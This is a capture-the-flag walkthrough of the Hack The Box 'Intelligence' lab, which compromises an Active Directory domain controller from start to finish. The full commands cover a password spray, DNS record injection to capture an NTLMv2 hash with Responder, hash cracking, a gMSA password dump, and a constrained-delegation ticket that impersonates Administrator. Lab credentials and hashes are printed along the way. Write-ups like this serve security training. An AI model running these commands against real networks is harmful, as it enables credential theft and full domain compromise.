Hack The Box: Intelligence

Walkthrough

• Nmap
• Website hosting PDFs
• Usernames in Exifdata
• BurpSuite and Console Magic
• Finding a default password
• Password Spray and SMB Access as Tiffany.Molina
• Downdetector.ps1
• Adding a DNS record
• Getting and Cracking hash of Ted.Graves
• Bloodhound
• Reading gMSA Passwords using gMSADumper
• Exploiting Constrained Delegation to get an Administrator Ticket

At first I start with a basic nmap scan of the target system.

 

Ldap always provides a nice way to enumerate the targets domain. So we scan the ldap port and retrieve the domain dc.intelligence.htb.

This name is added to the /etc/hosts file

Theres also Port 80 open so we are going to check out the website aswell.

We can also see PDfs listed on this page:

• /documents/2020-01-01-upload.pdf
• /documents/2020-12-15-upload.pdf

So we can assume that there are more PDFs with filenames containing numerical Months and Days

We also download these pdfs and looked into them using exiftool. Here we can find that the Creator attribute is set and they differ from each other. So now we try to find more PDFs containing usernames.

I used BurpSuite Intruders ClusterBomb Attack for this Task. Here we select the month and Day fields and create

After that we define the payload sets. In this case a simple number list for Months and days. Min integer was set to 2 to the minimum number adds a corresponding 0 for numbers underneath 10.

Starting the attack and filtering for status code 200 retrieves alot possible PDF files and looking into the response we can see all files contain different Creator names.

I select all lines now and save them to a file

This results in a big file containing alot of junk but we can filter for the PDF-URLs using grep

 pdf_filenames| grep "<url><”

cat pdf_filenames| grep "<url><”

using crapy/hacky command line magic we can cut out the domain paths.

cat pdf_filenames| grep "<url><" | cut -d "[" -f 3 | cut -d "]" -f 1

We could also download all pdfs using a bash for loop.

for i in $(cat pdf_filenames| grep "<url><" | cut -d "[" -f 3 | cut -d "]" -f 1);do wget $i; done

and now we can also use the same technique to extract all creators from the pdfs.

for i in $(find .); do exiftool $i | grep Creator | cut -d ":" -f 2 >>usernames.txt; done

Some of the Usernames were listed multiple times so we now have to remove all suplicates and sort the list to make it unique

cat usernames.txt | sort | uniq > ../uniq_usernames.txt

Now that we extracted everythin useful im looking into the pdfs, maybe we find something useful.

In PDF 2020-06-04-upload.pdf we can find useful information including a default password. Theres also another PDF 2020-12-30-upload.pdf containing information about service accounts

Now that we have a default password we can perform a password spray using CrackMapExec.

This results in valid SMB Credentials for the user intelligence.htb\\Tiffany.Molina. Which means she uses default credentials.

Im unable to login to the machine using winrm so we need to look what we can find in the SMB-Shares.

We have the Users SMB-Share which lets us look into User directories and download user.txt. Very nice but still have no shell access. Theres another IT SMB-Share which hosts a file called downdetector.ps1

Inside this file we see a script which queries the Active Directory DNS and searches for objects beginning with the word “web”. After that the script queries each entry and uses a webrequest to check if the website running behind the entry is up. So if we are able to add another DNS record we could get the hash of another user. The script automatically executes every five minutes.

So there is a tool https://github.com/dirkjanm/krbrelayx which contains a nice script to manipulate Active Directory Integrated DNS records via LDAP.

We only have to specify a few things

• -r is the TARGETRECORD which is named something starting with “web”
• -u is the username containing the domainname
• -p is the users Password
• -a says what you want to do in this case “add” a record
• -d is your ip adresss

python3 dnstool.py -u 'intelligence.htb\\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -d '10.10.16.38' -r webadmin 10.10.10.248

We can also just query the records to see if adding a new record was successfull

python3 dnstool.py -u 'intelligence.htb\\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a query -d '10.10.16.38' -r webadmin 10.10.10.248

Now we simply have to start responder and wait for a next script execution cycle

And after a short time we see a HTTP-NTLMv2 connection request containing a hash. Nice lets crack it.

Using Hashcat with mode 5600 (NetNTLMv2) the hash was cracked in under a second with rockyou.txt wordlist and a nice GPU.

.\hashcat64.exe -a 0 -m 5600 .\\hash.txt .\\rockyou.txt

I tried kerberoasting next but I wasnt able to get another hash trhough this way. I also cant access the server using winrm but I was able to run BloodHound.py using Teds Credentials

python3 bloodhound.py -u Ted.Graves -d intelligence.htb -p Mr.Teddy -c all -dc dc.intelligence.htb -ns 10.10.10.248

 

And when we query Teds user now we can see that he has Outbound Group Delegated Object Control through the ITSUPPORT Group object and is able to the read GSMA Password of the user SVC_INT$ User Object.

 

gMSA's password is calculated on-demand by Domain Controller (KDC) and automatic password changes are done periodically. In contrast to passwords used by standard domain user accounts, gMSA passwords are not stored locally on computers nor exposed to users.

There are several ways to abuse the ability to read the GMSA password. The most straight forward abuse is possible when the GMSA is currently logged on to a computer, which is the intended behavior for a GMSA. If the GMSA is logged on to the computer account which is granted the ability to retrieve the GMSA's password, simply steal the token from the process running as the GMSA, or inject into that process.

If the GMSA is not logged onto the computer, you may create a scheduled task or service set to run as the GMSA. The computer account will start the sheduled task or service as the GMSA, and then you may abuse the GMSA logon in the same fashion you would a standard user running processes on the machine (see the "HasSession" help modal for more details).

Finally, it is possible to remotely retrieve the password for the GMSA and convert that password to its equivalent NT hash.gMSADumper.py can be used for that purpose.

python3 gMSADumper.py -d intelligence.htb -u Ted.Graves -p Mr.Teddy -l dc.intelligence.htb

Nice we got another hash of the user “svc_int$” and looking for it in bloodhound we can that the user has constrained delegation right to the DC.

Abusing Constrained Delegation

In the following example, victim is the attacker-controlled account (i.e. the hash is known) that is configured for constrained delegation. The command first requests a TGT for the victim user and executes the S4U2self/S4U2proxy process to impersonate the "admin" user to the "HTTP/PRIMARY.testlab.local" SPN. The alternative sname "cifs" is substituted in to the final service ticket. This grants the attacker the ability to access the file system of PRIMARY.testlab.local as the "admin" user.

getST.py -spn 'HTTP/PRIMARY.testlab.local' -impersonate 'admin' -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'domain/victim'

This is the command for requesting a default CIFS service Ticket.

getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes :d365e889367ce3e3241b120db1df6e25 -dc-ip 10.10.10.248

And this allows us to get access to the DCs C$ Share or executing psexec which results in a nt authority/system shell on the DC.

Now we can read the root.txt file owned the machine!